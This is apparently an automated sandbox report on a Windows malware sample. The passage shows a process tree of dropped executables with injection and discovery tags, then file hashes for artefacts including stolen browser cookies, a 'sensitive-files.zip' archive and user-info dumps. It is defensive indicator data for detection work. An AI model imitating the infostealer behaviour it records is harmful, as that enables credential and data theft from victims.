                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                        PID:5292
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 1296
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:6212
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6212 -s 76
                                                                                                                                                                            5⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                            PID:6308
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:5700
                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 1652 -s 2132
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                        PID:1048
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:4580
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:5280
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:1092
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:5648
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:6228
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:1568
                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:3528
                                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:3724
                                                                                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:3880
                                                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:4020
                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:3116
                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:4324
                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:528
                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                      PID:3784
                                                                                                                                                                                    • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                                                                      C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:4884
                                                                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3496
                                                                                                                                                                                        • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                                                                          "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                          PID:5068
                                                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:3944
                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:2264
                                                                                                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:5072
                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:1960
                                                                                                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                  PID:1948
                                                                                                                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:3980
                                                                                                                                                                                                  • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
                                                                                                                                                                                                    C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:736
                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:3492
                                                                                                                                                                                                      • C:\Windows\sysWOW64\wbem\wmiprvse.exe
                                                                                                                                                                                                        C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:4748
                                                                                                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                          C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                          PID:5412
                                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                            C:\Windows\system32\WerFault.exe -pss -s 440 -p 5732 -ip 5732
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:644
                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 528 -p 1652 -ip 1652
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                              PID:5492
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5608 -ip 5608
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:3836
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4532 -ip 4532
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4436
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5340 -ip 5340
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                  PID:6584
                                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -pss -s 564 -p 6548 -ip 6548
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:7096
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5292 -ip 5292
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:6160
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6212 -ip 6212
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:6260
                                                                                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\system32\WerFault.exe -pss -s 616 -p 7936 -ip 7936
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:7764
                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                        PID:5820

                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                      • C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        153KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        f89267b24ecf471c16add613cec34473

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        c3aad9d69a3848cedb8912e237b06d21e1e9974f

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        21f12abb6de14e72d085bc0bd90d630956c399433e85275c4c144cd9818cbf92

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c29176c7e1d58dd4e1deafcbd72956b8c27e923fb79d511ee244c91777d3b3e41d0c3977a8a9fbe094bac371253481dde5b58abf4f2df989f303e5d262e1ce4d

                                                                                                                                                                                                                      • C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        120KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        53e54ac43786c11e0dde9db8f4eb27ab

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        9c5768d5ee037e90da77f174ef9401970060520e

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        2f606d24809902af1bb9cb59c16a2c82960d95bff923ea26f6a42076772f1db8

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        cd1f6d5f4d8cd19226151b6674124ab1e10950af5a049e8c082531867d71bfae9d7bc65641171fd55d203e4fba9756c80d11906d85a30b35ee4e8991adb21950

                                                                                                                                                                                                                      • C:\Program Files\Windows Media Player\graph\graph.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        245KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        7d254439af7b1caaa765420bea7fbd3f

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        7bd1d979de4a86cb0d8c2ad9e1945bd351339ad0

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        d6e7ceb5b05634efbd06c3e28233e92f1bd362a36473688fbaf952504b76d394

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c3164b2f09dc914066201562be6483f61d3c368675ac5d3466c2d5b754813b8b23fd09af86b1f15ab8cc91be8a52b3488323e7a65198e5b104f9c635ec5ed5cc

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\44\Process.txt

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        245B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        98c9e9af730a27bf19a9703132d29bce

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        5f02627db32179ac3edc56005762477743357cfb

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        5000d8dbe0058f08b0e12c9d2af3ad6fb3ff197213ecd4657582e72d81c5a808

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        ad5b013a8136cef7a8e8d407cf7d63e4fbe4b8dd66d6e8d3632bdcdd08c5eadbc3f348c5281724bb07ca1c4639e604e528574113303a9c12905b432c29cbcec5

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\44\Process.txt

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        8bb1d3611cdc1c42febe5bb10085e227

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        51c9cb6d2333190ddeb728039f736ff9b2e9c3a0

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        3d3053a0d225433ac405989dd7e4a80dc9b6ee147511bca3c18b56d5c2c09dbb

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        91e7103e121a427b676efb968acf6ef7fbdb99e0dc360e7f973c5ac8358146a510dfc8299201bcc65346d1e79821b4e123697b88d2fb992f2955fc7702213d2b

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9zRCLxPMdCs3YjnokhDD4mgm3YbZcr\Cookies\Chrome_Default_Network.txt

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        257B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        e531d4f2d5e8f1c28116eed93558eab8

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        c8633f7e6383a00feaa3e4a9570486942267ee86

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        68ef2f26ded177b3efade41f1a03e3a3ee3169c1c62d594bb505123d1ab33183

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        9e29e48c24401cdaa1a1b2c5bce9a7433d91af4b383004875a7961402c4a90bbe69b0de1b9dea9ede3dac6e6da5ced56f899eb91a66e725e0f48d1678d1cd720

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9zRCLxPMdCs3YjnokhDD4mgm3YbZcr\screen1.png

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        19KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        122ccdd6af3f4f83664eb7c1878c0d82

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        76710e508cea20e57649d3afb0686eb44fff5208

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        e6a4719de90be014fd62c6237114ba78d1431f12082895e8f82c65e8687d1bdb

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        9c2c3d954528cfb23546a6b20a3f23ae991c842f210f227380eaff5bb7014a4f20eace15ff100fe278a6559d2eef8643bf9cdc3c51b6e03a7523e614af3fafba

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9zRCLxPMdCs3YjnokhDD4mgm3YbZcr\sensitive-files.zip

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        7.0MB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        35a512d0a0fcd92a78e0a07d2ee5b42f

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        fe53e9ec4832c2e3f2369d1391bdc0af99a9649f

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        2e249f59c06f74e9759aaeeb2cec12a14812f0fb091621accc6f73ddd99912f7

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        a9e9da1404e7a63667c118b02c18a3e35ad72dcacedbdcd3891040e27c4b03fe0b57b632b74ecb58dfa7db6588473f27bd5616d88288cd8bec6e77d5ab8ca536

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9zRCLxPMdCs3YjnokhDD4mgm3YbZcr\user_info.txt

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        717B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        ea1a4b63623b56d3fe7e6f98d57beaa8

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        aa3ede875b64003d3044dc6049ac61521b496008

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        57ee9ce5b0367764d7b23d03e71d2eb2abecbd0a90ae3d16f0c7a4e6e523bd2d

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        259ab6a120a22450c3726dbbfff20544e74ff0a7e894cd6cad4c82a20856a928b3b0574f57e59858783644545daa8268d8a85c87549a5179198b5ee72717a2d2

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Cookies

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        20KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        49693267e0adbcd119f9f5e02adf3a80

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        3ba3d7f89b8ad195ca82c92737e960e1f2b349df

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\History

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        124KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        9618e15b04a4ddb39ed6c496575f6f95

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        1c28f8750e5555776b3c80b187c5d15a443a7412

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\select.pyd

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        30KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        7c14c7bc02e47d5c8158383cb7e14124

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        5ee9e5968e7b5ce9e4c53a303dac9fc8faf98df3

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        00bd8bb6dec8c291ec14c8ddfb2209d85f96db02c7a3c39903803384ff3a65e5

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        af70cbdd882b923013cb47545633b1147ce45c547b8202d7555043cfa77c1deee8a51a2bc5f93db4e3b9cbf7818f625ca8e3b367bffc534e26d35f475351a77c

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Tmp1D42.tmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        328231ff28d796b81f3a948d740390f9

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        a846d6ee7d372650302703bcef37a3d1cc74cf58

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        3c991a7d9d237412de58d8b8e624f3ffc97054bddca0f814a6ec44d5ad89f7ed

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c137ebca13a36b693b055502ef75fe368f82b2a3c980f2957051ea527ee65dcb12bc72a2d5b538d4d80fd0fbf6c5c6a2821bfe83d990f5489e2eff97c0992bee

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ovkwtxfx.4kt.ps1

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        60B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1.8MB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        3b8b3018e3283830627249d26305419d

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        40fa5ef5594f9e32810c023aba5b6b8cea82f680

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        258e444e78225f74d47ba4698d49a33e6d1f6ed1f3f710186be426078e2bf1cb

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        2e9a42e53406446b503f150abfa16b994ee34211830d14ccbfbf52d86019dc5cca95c40222e5c6aed910c90988f999560ff972c575f9c207d7834abba6f04aa0

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        5.9MB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        3297554944a2e2892096a8fb14c86164

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        4b700666815448a1e0f4f389135fddb3612893ec

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        e0a9fcd5805e66254aa20f8ddb3bdfca376a858b19222b178cc8893f914a6495

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        499aa1679f019e29b4d871a472d24b89adddc68978317f85f095c7278f25f926cbf532c8520c2f468b3942a3e37e9be20aea9f83c68e8b5e0c9adbf69640ad25

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\50.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2.6MB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        38c56adb21dc68729fcc9b2d97d72ac1

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        c08c6d344aa88b87d7741d4b249dcc937dad0cea

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        7807125f9d53afac3fe1037dd8def3f039cba5f57a170526bdaaf2e0e09365fb

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        c4f5a7fa9013dfe33a89dcca5640f37b5309b5ef354a5518877512bbbdc072ba8bfaebde0da3b55aacf0bdcbb443d368a3f60e91bedea6c1cc754393943ca530

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\50to.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        6.6MB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        47f6b0028c7d8b03e2915eb90d0d9478

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        abc4adf0b050ccea35496c01f33311b84fba60c6

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        c656d874c62682dd7af9ab4b7001afcc4aab15f3e0bc7cdfd9b3f40c15259e3f

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        ae4e7b9a9f4832fab3fe5c7ad7fc71ae5839fd8469e3cbd2f753592853a441aa89643914eda3838cd72afd6dee029dd29dc43eaf7db3adc989beab43643951a2

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\888.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        4.7MB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        b6e5859c20c608bf7e23a9b4f8b3b699

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        302a43d218e5fd4e766d8ac439d04c5662956cc3

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        bd5532a95156e366332a5ad57c97ca65a57816e702d3bf1216d4e09b899f3075

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        60c84125668bf01458347e029fdc374f02290ef1086645ae6d6d4ecadccb6555a2b955013f89d470d61d8251c7054a71b932d1207b68118ad82550c87168332c

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1.8MB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        58f824a8f6a71da8e9a1acc97fc26d52

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        b0e199e6f85626edebbecd13609a011cf953df69

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        5e5b808ed64c4f40e07a4894e1da294e364383f0a51adb7ec8c7568afba3eb17

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        7d6c752369ea83bad34873d8603c413e9372ff66adcaad11e7f23d3ce85827e057444b30eadf927329191825aef4dc37a1e68c30b71fae4ce6f53708102fb461

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        591KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        3567cb15156760b2f111512ffdbc1451

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        2fdb1f235fc5a9a32477dab4220ece5fda1539d4

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        e7a31b016417218387a4702e525d33dd4fe496557539b2ab173cec0cb92052c750cfc4b3e7f02f3c66ac23f19a0c8a4eb6c9d2b590a5e9faeb525e517bc877ba

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1.1MB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        c5ad2e085a9ff5c605572215c40029e1

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        252fe2d36d552bcf8752be2bdd62eb7711d3b2ab

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        47c8723d2034a43fb63f89e2bcd731c99c1c316b238957720c761a0301202e05

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        8878a0f2678908136158f3a6d88393e6831dfe1e64aa82adbb17c26b223381d5ac166dc241bedd554c8dd4e687e9bee624a91fbe3d2976ddfea1d811bf26f6d4

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        898KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        5950611ed70f90b758610609e2aee8e6

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        798588341c108850c79da309be33495faf2f3246

                                                                                                                                                                                                                        SHA256

